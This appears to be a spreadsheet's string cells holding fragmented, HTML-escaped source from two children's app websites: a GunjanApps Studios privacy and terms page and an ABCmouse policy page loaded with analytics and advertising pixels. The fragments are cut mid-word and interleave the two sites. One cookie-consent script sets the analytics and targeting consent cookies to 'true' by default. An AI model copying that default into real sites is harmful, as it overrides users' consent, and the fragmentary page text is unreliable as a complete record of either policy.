&lt;!-- &lt;script src="https://gunjanappstudios.com/public/layerslider/jquery.jcarousel.js"&gt;&lt;/script&gt; --&gt;
&lt;!-- &lt;script src="https://gunjanappstudios.com/public/layerslider/jquery.fancybox.min.js"&gt;&lt;/script&gt; --&gt;
&lt;script src="https://unpkg.com/@lottiefiles/lottie-player@latest/dist/lottie-player.js" defer&gt;&lt;/script&gt;
&lt;script src="https://unpkg.com/@lottiefiles/lottie-player@0.4.0/dist/tgs-player.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;
    $(document).ready(function(){
        let players = document.getElementsByTagName("lottie-player");
        for (let item of players) {
            item.play();
        }
    })
</t>
  </si>
  <si>
    <t>&lt;/script&gt;
    &lt;style&gt;
        .top,
        .main-nav nav .navbar-nav .nav-item .dropdown-menu,
        .video-button:before,
        .video-button:after,
        .special .read-more a,
        .service .read-more a,
        .testimonial-bg,
        .project .read-more a,
        .team-text,
        .cta .overlay,
        .blog-area .blog-image .date,
        .blog-area .read-more a,
        .newsletter-area .overlay,
        .footer-social-link ul li a,
        .scroll-top,
        .single-section .read-more a,
        .sidebar .widget .search button,
        .comment button,
        .contact-item:hover .contact-icon,
        .product-item .text button,
        .btn-arf,
        .project-photo-carousel .owl-nav .owl-prev,
        .project-photo-carousel .owl-nav .owl-next,
        .faq</t>
  </si>
  <si>
    <t>h4.panel-title a,
        .team-social li a:hover,
        .doc_detail_social li i,
        .nav-doctor .nav-link.active,
        .product-detail button,
        .product-detail .nav-pills .nav-link.active,
        .contact-form .btn,
        .career-sidebar .widget button {
            background: #3867D6!important;
        }
        .main-nav nav .navbar-nav .nav-item a:hover,
        .main-nav nav .navbar-nav .nav-item:hover a,
        .service .service-item .text h3 a:hover,
        .project .project-item .text h3 a:hover,
        .blog-area .blog-item h3 a:hover,
        .footer-item ul li a:hover,
        .sidebar .widget .type-2 ul li a:hover,
        .sidebar .widget</t>
  </si>
  <si>
    <t>.type-1 ul li: before,
        .sidebar .widget .type-1 ul li</t>
  </si>
  <si>
    <t>a:hover,
        .single-section h3,
        .contact-icon,
        .product-item .text h3 a:hover,
        .career-main-item h3,
        .reg-login-form .new-user a,
        .product-detail .nav-pills .nav-link {
            color: #3867D6!important;
        }
        .text-animated li a:hover,
        .feature .feature-item {
            background-color: #3867D6!important;
        }
        .text-animated li a:hover,
        .special .read-more a,
        .footer-social-link ul li a,
        .contact-item:hover .contact-icon,
        .faq h4.panel-title,
        .team-social li a:hover,
        .contact-form .btn {
            border-color: #3867D6!important;
        }
        .main-nav nav .navbar-nav .nav-item .dropdown-menu li a,
        .contact-item:hover .contact-icon,
        .product-detail .nav-pills .nav-link.active {
            color: #fff!important;
        }
        .feature .feature-item:hover,
        .service .read-more a:hover,
        .project .read-more a:hover,
        .blog-area .read-more a:hover,
        .single-section .read-more a:hover,
        .comment button:hover,
        .doc_detail_social li:hover i,
        .product-detail button:hover,
        .contact-form .btn: hover {
            background: #333!important;
        }
        .footer-social-link ul li a:hover {
            background: transparent!important;
        }
        .special .read-more a:hover {
            background: transparent!important;
            border-color: #fff!important;
        }
    &lt;/style&gt;
&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;1,100;1,400;1,500&amp;family=Titan+One&amp;display=swap" rel="stylesheet"&gt;
&lt;link href="https://fonts.googleapis.com/ css2?family=Fredoka+One&amp;family=Roboto:ital,wght@0,100;0,300;0,400;0,500;1,100;1,400;1,500&amp;family=Titan+One&amp;display=swap" rel="stylesheet"&gt;
&lt;!-- &lt;script&gt;--&gt;
&lt;!--    let str=navigator.userAgent.toLowerCase();--&gt;
&lt;!--let</t>
  </si>
  <si>
    <t>version=str.substring(str.indexOf("version/") + 8,str.lastIndexOf("/")).split(" ")--&gt;
&lt;! --if(version[1]=='safari' &amp;&amp; parseFloat(version[0])&gt;15){--&gt;
&lt;! --document.getElementsByClassName(".video0verlay:after").style.background-image = "url(../../uploads/Con3.svg)";--&gt;
&lt;!--}--&gt;
&lt;!--</t>
  </si>
  <si>
    <t>&lt;/script&gt;--&gt;
&lt;/head&gt;
&lt;body class="current_route_name-front.privacy"&gt;
&lt;!-- code by pooja(code for top navbar) --&gt;
&lt;!-- &lt;div class="top"&gt;
    &lt;div class="container"&gt;
        &lt;div class="row"&gt;
            &lt;div class="col-md-6"&gt;
                &lt;div class="top-contact"&gt;
                    &lt;ul&gt;
                        &lt;li&gt;
                            &lt;i class="fa fa-envelope-o" aria-hidden="true"&gt;&lt;/i&gt;
                            &lt;span&gt;info@yourwebsite.com&lt;/span&gt;
                        &lt;/li&gt;
                        &lt;li&gt;
                            &lt;i class="fa fa-phone" aria-hidden="true"&gt;&lt;/i&gt;
                            &lt;span&gt;111-222-3456&lt;/span&gt;
                        &lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/div&gt;
            &lt;/div&gt;
            &lt;div class="col-md-6"&gt;
                &lt;div class="top-right"&gt;
                                        &lt;div class="top-social"&gt;
                        &lt;ul&gt;
                                                            &lt;li&gt;&lt;a href="https://www.linkedin.com/company/gunjanappstudios/" target="_blank"&gt;&lt;i class="fab fa-linkedin"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
                                                            &lt;li&gt;&lt;a href="https://www.youtube.com/c/KidsEducationalTV/" target="_blank"&gt;&lt;i class="fab fa-youtube"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
                                                            &lt;li&gt;&lt;a href="https://www.instagram.com/gunjanapps_studios/" target="_blank"&gt;&lt;i class="fab fa-instagram"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
                                                            &lt;li&gt;&lt;a href="https://www.facebook.com/gunjanappsstudios" target="_blank"&gt;&lt;i class="fab fa-facebook-f"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;
                                                    &lt;/ul&gt;
                    &lt;/div&gt;
                &lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt; --&gt;
&lt;!-- code by pooja(code for top navbar) --&gt;
&lt;!-- Start Navbar Area --&gt;
&lt;div class="navbar-area header" id="stickymenu"&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Menu For Mobile Device --&gt;
    &lt;div class="mobile-nav"&gt;
        &lt;a href="https://gunjanappstudios.com" class="logo"&gt;
            &lt;img src="https://gunjanappstudios.com/public/uploads/logo.png" alt=""&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;!-- Menu For Desktop Device --&gt;
    &lt;div class="header-sticky "&gt;
    &lt;div class="main-nav"&gt;
        &lt;div class="container"&gt;
            &lt;nav class="navbar navbar-expand-md navbar-light"&gt;
                &lt;a class="navbar-brand" href="https://gunjanappstudios.com"&gt;
                    &lt;img src="https://gunjanappstudios.com/public/uploads/logo2.png" alt="logo"&gt;
                &lt;/a&gt;
                &lt;a href="https://gunjanappstudios.com" class="scroll-logo" style="display:none;"&gt;
                    &lt;img src="https://gunjanappstudios.com/public/uploads/logo2.png" alt=""&gt;
                &lt;/a&gt;
                                &lt;div class="collapse navbar-collapse mean-menu" id="navbarSupportedContent"&gt;
                    &lt;ul class="navbar-nav ml-auto"&gt;
                                                &lt;li class="nav-item"&gt;
                            &lt;a href="https://gunjanappstudios.com" class="nav-link" id="home"&gt;Home&lt;/a&gt;
                        &lt;/li&gt;
                                                &lt;li class="nav-item"&gt;
                            &lt;a href="https://gunjanappstudios.com/games" class="nav-link " id="games"&gt;Games&lt;/a&gt;
                        &lt;/li&gt;
                                                &lt;li class="nav-item"&gt;
                            &lt;a href="https://gunjanappstudios.com/youtube" class="nav-link " id="youtube"&gt;Youtube&lt;/a&gt;
                        &lt;/li&gt;
                                                &lt;li class="nav-item"&gt;
                            &lt;a href="https://gunjanappstudios.com/blog" class="nav-link " id="blog"&gt;Blog&lt;/a&gt;
                        &lt;/li&gt;
                                                    &lt;li class="nav-item"&gt;
                                &lt;a href="https://gunjanappstudios.com/career" class="nav-link" id="career"&gt;Career&lt;/a&gt;
                            &lt;/li&gt;
                        &lt;!-- 
                                                &lt;li class="nav-item"&gt;
                            &lt;a href="javascript:void(0);" class="nav-link dropdown-toggle"&gt;Pages&lt;/a&gt;
                            &lt;ul class="dropdown-menu"&gt;
                                                                &lt;li class="nav-item"&gt;
                                    &lt;a href="https://gunjanappstudios.com/career" class="nav-link"&gt;Career&lt;/a&gt;
                                &lt;/li&gt;
                                                                &lt;li class="nav-item"&gt;
                                    &lt;a href="https://gunjanappstudios.com/youtube" class="nav-link"&gt;Video Gallery&lt;/a&gt;
                                &lt;/li&gt;
                                                                    &lt;li class="nav-item"&gt;
                                        &lt;a href="https://gunjanappstudios.com/page/services" class="nav-link"&gt;services&lt;/a&gt;
                                    &lt;/li&gt;
                                                                    &lt;li class="nav-item"&gt;
                                        &lt;a href="https://gunjanappstudios.com/page/dynamic-page-2" class="nav-link"&gt;Dynamic Page 2&lt;/a&gt;
                                    &lt;/li&gt;
                            &lt;/ul&gt;
                        &lt;/li&gt;
                         --&gt;
                                                &lt;li class="nav-item"&gt;
                            &lt;a href="https://gunjanappstudios.com/contact" class="nav-link " id="contact"&gt;Contact&lt;/a&gt;
                        &lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/div&gt;
            &lt;/nav&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;!-- End Navbar Area --&gt;
&lt;script type="text/javascript"&gt;
$(document).ready(function(){
    // checking current url
    var url = window.location.pathname.split( '/' );
    if(url[1]){
        $('#stickymenu').removeClass('inner-nav');
        $('#stickymenu').addClass('inner-nav');
        $('#'+url[1]+'').parent().addClass('active');
    }else{
        $('#stickymenu').removeClass('inner-nav');
        $('#home').parent().addClass('active');
    }
  $(window).scroll(function(){
    var scrollTop</t>
  </si>
  <si>
    <t>If you have any questions about our privacy policy, please Contact Us.&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;_x005F_x000D_
                        &lt;b&gt;Apps with NO Ads&lt;/b&gt;_x005F_x000D_
                        &amp;nbsp;_x005F_x000D_
                    &lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&amp;nbsp; &amp;nbsp; • We do not use any third-party advertising&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&amp;nbsp; &amp;nbsp; • We do not share data with any third party&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&amp;nbsp; &amp;nbsp; • We do not collect any device data for purposes beyond third-party analytics&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&amp;nbsp; &amp;nbsp; • We just show our inhouse Ads of our own apps, through more apps section and try our new apps popup&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&amp;nbsp; &amp;nbsp; • Unity Analytics tracks app install and IAP data mentioned specifically in the App privacy section of the store listing page of each app&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;b&gt;What third parties collect via our apps if they contain Ads&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt; We receive some information automatically when you use our Apps. This includes data about your device, software, operating system, the language you’ve set for your Device, advertising IDs for advertisement tracking (“Advertising IDs”) and your IP address.&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;</t>
  </si>
  <si>
    <t>We do not collect personally identifiable information about you or your children through our apps. In other words, we do not collect information such as your name, address, phone number or email address.&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;Occasionally we collect the personal information that you voluntarily provide to us (e.g., email addresses you give us when you submit a request to a support via our web or email).&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;When you make in-app purchases in our Games, we do not collect or have any access to your name and billing information. This information is collected and stored by your platform (Android’s Google Play or IOS App Store) or your platform’s payment processor.&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;Few of our apps might use Google Analytics (third party scripts) that collect the following information and might (also) store such information as a cookie on the device you use to access our Apps:&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;Google Analytics or Unity Analytics (Not applicable for IOS apps without Ads):&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;Demographics (browser language, country, city);&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;System information (browser, OS, service provider);&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;Mobile (OS, service provider, screen resolution);&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;Site behaviour (which pages users visit, duration of visit);&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;For more information about our partners’ practices, kindly visit the following links:&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;a href="https://www.google.com/policies/privacy/partners/" target="_blank"&gt;https://www.google.com/policies/privacy/partners/&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;a href="https://policies.google.com/privacy" target="_blank"&gt;https://policies.google.com/privacy&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p id="terms-of-use"&gt;&lt;a href="https://unity3d.com/legal/privacy-policy" target="_blank"&gt;https://unity3d.com/legal/privacy-policy&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;a href="https://inmobi.com/privacy-policy/" target="_blank"&gt;https://inmobi.com/privacy-policy/&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_
                    _</t>
  </si>
  <si>
    <t>x000D_
                    &lt;div class="heading"&gt;_x005F_x000D_
                        &lt;h2 class="heding_s"&gt;Terms of Use&lt;/h2&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                    &lt;p&gt;&lt;b&gt;How we use this information collected in our Games (Terms of Use)&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;We collect this Information to improve performance and reliability of our Games and to get a better understanding of what users in general prefer. We do not link any of this Information in any way to individuals or any other information we might obtain. We do not share, sell or in any other way give other persons or companies.</t>
  </si>
  <si>
    <t>We don’t rent or sell your email address.&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;Our mobile applications comply with the Children’s Online Privacy Protection Act (“COPPA”). In the event that a user identifies himself/herself as a child under the age of 13 through a support request or feedback, we will not collect, store or use and will delete in a secure manner any personal information of such a user.&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt; We take care of filtering categories of sensitive and unsuitable ads for children.</t>
  </si>
  <si>
    <t>But rarely can an advertiser misclassify your ads, and this situation is beyond our reach.&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;b&gt;Changes to this privacy policy&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p id="cookies"&gt;GunjanApps Studios has the discretion to update this privacy policy at any time. When we do, we will revise the updated date at the bottom of this page. We encourage Users to frequently check this page for any changes to stay informed about how we are helping to protect the personal information we collect.</t>
  </si>
  <si>
    <t>You acknowledge and agree that it is your responsibility to review this privacy policy periodically and become aware of modifications.&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt; For further information kindly visit the following links:&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;a href="https://www.apple.com/legal/internet-services/itunes/dev/stdeula/" target="_blank"&gt;https://www.apple.com/legal/internet-services/itunes/dev/stdeula/&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;a href="https://play.google.com/about/play-terms/index.html" target="_blank"&gt;https://play.google.com/about/play-terms/index.html&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;&lt;br&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
                    &lt;div class="heading"&gt;_x005F_x000D_
                        &lt;h2 class="heding_s"&gt;Cookies&lt;/h2&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                    &lt;p&gt;&lt;b&gt;Cookies&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;p&gt;When you visit our website, we may send cookies to your computer that uniquely identify your browser. We use cookies to improve the quality of our service by storing user preferences and tracking usage information.</t>
  </si>
  <si>
    <t>Most browsers allow you to disable cookies or set your browser to alert you when cookies are being sent to your computer.&lt;/p&gt;
                    &lt;!-- &lt;p&gt;
                        &lt;b&gt;Privacy Policy&lt;/b&gt;
                        &lt;br&gt;
                    &lt;/p&gt;
                    &lt;p&gt;We respect and value your privacy here at GunjanApps Studios.&lt;/p&gt;
                    &lt;p&gt; Our Privacy Policy describes the information collected by our company GunjanApps Studios, and our partners, through our mobile applications and the use of the information.&lt;/p&gt;
                    &lt;p&gt;If you have any questions about our privacy policy, please Contact Us.&lt;/p&gt;
                    &lt;p&gt;
                        &lt;b&gt;Apps with NO Ads&lt;/b&gt;
                        &amp;nbsp;
                    &lt;/p&gt;
                    &lt;p&gt;&amp;nbsp; &amp;nbsp; • We do not use any third-party advertising&lt;/p&gt;
                    &lt;p&gt;&amp;nbsp; &amp;nbsp; • We do not share data with any third party&lt;/p&gt;
                    &lt;p&gt;&amp;nbsp; &amp;nbsp; • We do not collect any device data for purposes beyond third-party analytics&lt;/p&gt;
                    &lt;p&gt;&amp;nbsp; &amp;nbsp; • We just show our inhouse Ads of our own apps, through more apps section and try our new apps popup&lt;/p&gt;
                    &lt;p&gt;&amp;nbsp; &amp;nbsp; • Unity Analytics tracks app install and IAP data mentioned specifically in the App privacy section of the store listing page of each app&lt;/p&gt;
                    &lt;p&gt;&lt;br&gt;&lt;/p&gt;
                    &lt;p&gt;&lt;b&gt;What third parties collect via our apps if they contain Ads&lt;/b&gt;&lt;/p&gt;
                    &lt;p&gt;</t>
  </si>
  <si>
    <t>We receive some information automatically when you use our Apps. This includes data about your device, software, operating system, the language you’ve set for your Device, advertising IDs for advertisement tracking (“Advertising IDs”) and your IP address.&lt;/p&gt;
                    &lt;p&gt; We do not collect personally identifiable information about you or your children through our apps.</t>
  </si>
  <si>
    <t>In other words, we do not collect information such as your name, address, phone number or email address.&lt;/p&gt;
                    &lt;p&gt;Occasionally we collect the personal information that you voluntarily provide to us (e.g., email addresses you give us when you submit a request to a support via our web or email).&lt;/p&gt;
                    &lt;p&gt;When you make in-app purchases in our Games, we do not collect or have any access to your name and billing information. This information is collected and stored by your platform (Android’s Google Play or IOS App Store) or your platform’s payment processor.&lt;/p&gt;
                    &lt;p&gt;Few of our apps might use Google Analytics (third party scripts) that collect the following information and might (also) store such information as a cookie on the device you use to access our Apps:&lt;/p&gt;
                    &lt;p&gt;Google Analytics or Unity Analytics (Not applicable for IOS apps without Ads):&lt;/p&gt;
                    &lt;p&gt;Demographics (browser language, country, city);&lt;/p&gt;
                    &lt;p&gt;System information (browser, OS, service provider);&lt;/p&gt;
                    &lt;p&gt;Mobile (OS, service provider, screen resolution);&lt;/p&gt;
                    &lt;p&gt;Site behaviour (which pages users visit, duration of visit);&lt;/p&gt;
                     &lt;p&gt;For more information about our partners’ practices, kindly visit the following links:&lt;/p&gt;
                    &lt;p&gt;&lt;br&gt;&lt;/p&gt;
                    &lt;p&gt;&lt;a href="https://www.google.com/policies/privacy/partners/" target="_blank"&gt;https://www.google.com/policies/privacy/partners/&lt;/a&gt;&lt;/p&gt;
                    &lt;p&gt;&lt;a href="https://policies.google.com/privacy" target="_blank"&gt;https://policies.google.com/privacy&lt;/a&gt;&lt;/p&gt;
                    &lt;p&gt;&lt;a href="https://unity3d.com/legal/privacy-policy" target="_blank"&gt;https://unity3d.com/legal/privacy-policy&lt;/a&gt;&lt;/p&gt;
                    &lt;p&gt;&lt;a href="https://inmobi.com/privacy-policy/" target="_blank"&gt;https://inmobi.com/privacy-policy/&lt;/a&gt;&lt;/p&gt;
                    &lt;p&gt;&lt;br&gt;&lt;/p&gt;
                    &lt;p&gt;&lt;br&gt;&lt;/p&gt;
                    &lt;div class="heading"&gt;
                        &lt;h2 class="heding_s" id="terms-of-use"&gt;Terms of Use&lt;/h2&gt;
                    &lt;/div&gt;
                    &lt;p&gt;&lt;b&gt;How we use this information collected in our Games (Terms of Use)&lt;/b&gt;&lt;/p&gt;
                    &lt;p&gt;We collect this Information to improve performance and reliability of our Games and to get a better understanding of what users in general prefer.</t>
  </si>
  <si>
    <t>We do not link any of this Information in any way to individuals or any other information we might obtain. We do not share, sell or in any other way give other persons or companies. We don’t ren</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
    &lt;head&gt;
                &lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;
        &lt;meta http-equiv="expires" content="0"&gt;
        &lt;meta  http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
        &lt;!-- Cookies Consent start --&gt;
        &lt;script type="text/javascript"&gt;
            function setCookie(cookieName, cookieValue) {
                document.cookie = cookieName + '=' + cookieValue;
            };
            function getCookie(cookieName) {
                var name = cookieName + '=';
                var cookies = document.cookie.split(';');
                for (var i = 0; i &lt; cookies.length; i++) {
                    var cookie = cookies[i].trim();
                    if (cookie.indexOf(name) == 0) {
                        return cookie.substring(name.length, cookie.length);
                    }
                }
                return '';
            };
            if (getCookie('ANALYTICS_PERFORMANCE_COOKIES') === '') {
                setCookie('ANALYTICS_PERFORMANCE_COOKIES', 'true');
            }
            if (getCookie('TARGETING_COOKIES') === '') {
                setCookie('TARGETING_COOKIES', 'true');
            }
        &lt;/script&gt;
        &lt;!-- Cookies Consent end --&gt;
        &lt;script type="text/javascript"&gt;
            var touchCapable = false;
            function templateData(){
                this.homePage =</t>
  </si>
  <si>
    <t>[];
                this.webhost = 'https://www.abcmouse.com';
                this.imghost = 'https://img.abcmouse.com';
                this.language = '';
            }
            var gl = new templateData();
        &lt;/script&gt;        &lt;title&gt;ABCmouse.com&lt;/title&gt;
                        &lt;link rel="stylesheet" type="text/css" href="https://img.abcmouse.com/home/css/reset.css" /&gt;
        &lt;link rel="stylesheet" type="text/css" href="https://img.abcmouse.com/css/nmhp/html5_code_template.css" /&gt;
		&lt;link rel="stylesheet" type="text/css" href="https://img.abcmouse.com/css/html5/locale/en/nmhp/fonts.css"&gt;
        &lt;link rel="stylesheet" type="text/css" href="https://img.abcmouse.com/css/html5/videoplayer.css" /&gt;
        &lt;link rel="stylesheet" type="text/css" href="https://img.abcmouse.com/home/css/common.css?v=1421117027" /&gt;
                    &lt;link rel='stylesheet' type='text/css' href="https://img.abcmouse.com/css/flowplayer/functional.min.css"  /&gt;
            &lt;link rel='stylesheet' type='text/css' href="https://img.abcmouse.com/css/flowplayer/embedplayer.min.css"  /&gt;
                            &lt;link rel="stylesheet" type="text/css" href="https://img.abcmouse.com/css/nmhp/common.css" /&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/core_client_library/js/legacy-sites-js/1.0/ajaxloader.js?v=1585942653"&gt;&lt;/script&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/js/abcmouse_utils.js?v=1604356970"&gt;&lt;/script&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/js/misc.js"&gt;&lt;/script&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/core_client_library/js/legacy-sites-js/1.0/utils.js"&gt;&lt;/script&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/js/html5/videoplayer_new.js"&gt;&lt;/script&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/js/html5/verticalscrollbar.js"&gt;&lt;/script&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/js/html5/scrolltabletdiv.js"&gt;&lt;/script&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/js/custom-radio.js"&gt;&lt;/script&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/core_client_library/js/jquery/2.1.3/jquery.min.js"&gt;&lt;/script&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/js/flowplayer/6.0.4/flowplayer.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="https://img.abcmouse.com/js/flowplayer/embedplayer_3_0.min.js"&gt;&lt;/script&gt;            &lt;script type="text/javascript"&gt;_x005F_x000D_
                (function(){_x005F_x000D_
                    window._pxAppId = 'PXTU0h5FRQ';_x005F_x000D_
                    //</t>
  </si>
  <si>
    <t>Custom parameters_x005F_x000D_
                    // window._pxParam1 = "&lt;param1&gt;";_x005F_x000D_
                    var p = document.getElementsByTagName('script')[0],_x005F_x000D_
                        s = document.createElement('script');_x005F_x000D_
                    s.async = 1;_x005F_x000D_
                    s.src = '//client.perimeterx.net/PXTU0h5FRQ/main.min.js';_x005F_x000D_
                    p.parentNode.insertBefore(s,p);_x005F_x000D_
                }());_x005F_x000D_
            &lt;/script&gt;_x005F_x000D_
_x005F_x000D_
            &lt;!-- Bing Pixel --&gt;_x005F_x000D_
            &lt;script&gt;(function(w,d,t,r,u){var f,n,i;w[u]=w[u]||[],f=function(){var o={ti:"4021041"};o.q=w[u],w[u]=new UET(o),w[u].push("pageLoad")},n=d.createElement(t),n.src=r,n.async=1,n.onload=n.onreadystatechange=function(){var s=this.readyState;s&amp;&amp;s!=="loaded"&amp;&amp;s!=="complete"||(f(),n.onload=n.onreadystatechange=null)},i=d.getElementsByTagName(t)[0],i.parentNode.insertBefore(n,i)})(window,document,"script","//bat.bing.com/bat.js","uetq");&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
            &lt;!--</t>
  </si>
  <si>
    <t>Google Analytics Pixel (MKT-3403) --&gt;_x005F_x000D_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_x005F_x000D_
            ga('create', 'UA-19629713-1', 'auto');_x005F_x000D_
            ga('send', 'pageview');_x005F_x000D_
            &lt;/script&gt;_x005F_x000D_
_x005F_x000D_
            &lt;!-- Global site tag (gtag.js) - Google Ads: 1022130506 --&gt;_x005F_x000D_
            &lt;!-- Global site tag (gtag.js) - Google Ads: 10781399584 --&gt; _x005F_x000D_
            &lt;script async src="https://www.googletagmanager.com/gtag/js?id=AW-1022130506"&gt;&lt;/script&gt;_x005F_x000D_
            &lt;script&gt;_x005F_x000D_
            window.dataLayer</t>
  </si>
  <si>
    <t>function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?_x005F_x000D_
            n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;_x005F_x000D_
            n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;_x005F_x000D_
            t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,_x005F_x000D_
            document,'script','https://connect.facebook.net/en_US/fbevents.js');_x005F_x000D_
_ x000D_
            fbq('dataProcessingOptions', []);_x005F_x000D_
            fbq('init', '686407008078166');_x005F_x000D_
            fbq('track', "PageView");&lt;/script&gt;_x005F_x000D_
            &lt;noscript&gt;&lt;img height="1" width="1" style="display:none"_x005F_x000D_
            src="https://www.facebook.com/tr?id=686407008078166&amp;ev=PageView&amp;noscript=1"_x005F_x000D_
            /&gt;&lt;/noscript&gt;_x005F_x000D_
            &lt;!-- End Facebook Pixel Code --&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
            &lt;noscript&gt;_x005F_x000D_
                &lt;div style="position:fixed; top:0; left:0; display:none" width="1" height="1"&gt;_x005F_x000D_
                    &lt;img src="//collector-PXTU0h5FRQ.perimeterx.net/api/v1/collector/noScript.gif?appId=PXTU0h5FRQ" alt="PxPixel"&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/noscript&gt;         &lt;link rel="stylesheet" type="text/css" href="https://img.abcmouse.com/css/html5/policy_pages.css?version=1671735628" /&gt;&lt;link rel="stylesheet" type="text/css" href="https://img.abcmouse.com/css/tandc/tandc.css" /&gt;        &lt;!--</t>
  </si>
  <si>
    <t>Do custom stuff here before including included js files --&gt;
        &lt;script type="text/javascript"&gt;
            var touchCapable = false;
        &lt;/script&gt;
        &lt;!-- Mall Cart EnterID Cookie Check Per MKT-8643 - AD 11/15/2016 --&gt;
        &lt;script type="text/javascript"&gt;
            window.onpageshow = function(event) {
                   if (/offurl/.test(document.cookie)){
                       window.location.href = '/enterid';
                   }
            };
        &lt;/script&gt;
        &lt;!-- end pre JS --&gt;
        &lt;script type="text/javascript" src="https://img.abcmouse.com/js/policy_pages.js?v=1517255216"&gt;&lt;/script&gt;
        &lt;script type="text/javascript"&gt;
            var nohtml5 = false;
            closeLoginBox = closeFeedback = closeInfoPopup = closeTestimonialBox = function() {
                ABCmouseUtils.closeIframePopup();
            }
                function invalidateBackCache() {
                // necessary for Safari: mobile &amp; desktop
//console.log ("invalidateBackCache");//pl
//window.location.reload();
            }
            function loginPopupForgotpwdRedirect() {
                // function here to account for weird printed redirect text
                // in the login box 'forgotpwd' click functionality
                window.location = '/forgotpwd';
            }
            ABCmouseUtils.addEventListener(window, "unload", invalidateBackCache());
            ABCmouseUtils.addEventListener(window, "load", function() {
                if(window.devicePixelRatio &amp;&amp; window.devicePixelRatio &gt;= 1.5) {
                    isHD = "_hd";
                    ABCmouseUtils.addClassName(document.body, 'is_hd');
                }
                else { isHD = ""; }
                ABCmouseUtils.replaceImageSources(isHD, 'https://img.abcmouse.com');
                                    ABCmouseUtils.addEventListener(document.getElementById("main_mouse_logo"), "click", function() {
                        var target = "/";
                        var domain = window.location.hostname;
                        if(domain.indexOf(".cn") !</t>
  </si>
  <si>
    <t>Cookies Consent end --&gt;
    &lt;/head&gt;
&lt;!-- pl 09302013 --&gt;
    &lt;script type="text/javascript"&gt;
    var stop_scroll = false;
            function scrolltop(){
         //       alert("in scrolltop ");
            if(stop_scroll == true){
           //    alert("in scrolltop ");
                scroll(0,0) ;
            }
        }
